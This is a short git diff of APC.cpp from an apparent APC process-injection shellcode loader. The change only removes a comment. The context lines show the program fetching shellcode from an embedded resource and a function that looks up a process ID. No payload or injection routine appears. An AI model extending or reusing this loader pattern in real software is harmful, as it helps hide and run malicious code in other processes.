diff --git a/plug/APC-Ijnect Load/APC.cpp b/plug/APC-Ijnect Load/APC.cpp index ad4f38f..69af75f 100644 --- a/plug/APC-Ijnect Load/APC.cpp +++ b/plug/APC-Ijnect Load/APC.cpp @@ -70,7 +70,6 @@ DWORD FindProcessId() int APIENTRY wWinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPWSTR lpCmdLine, _In_ int nCmdShow) { - //1.Get shellcode and shellcodesize from Resource by ID UINT shellcodeSize = 0; unsigned char *shellcode = GetShellcodeFromRes(100, shellcodeSize); if (shellcode == nullptr)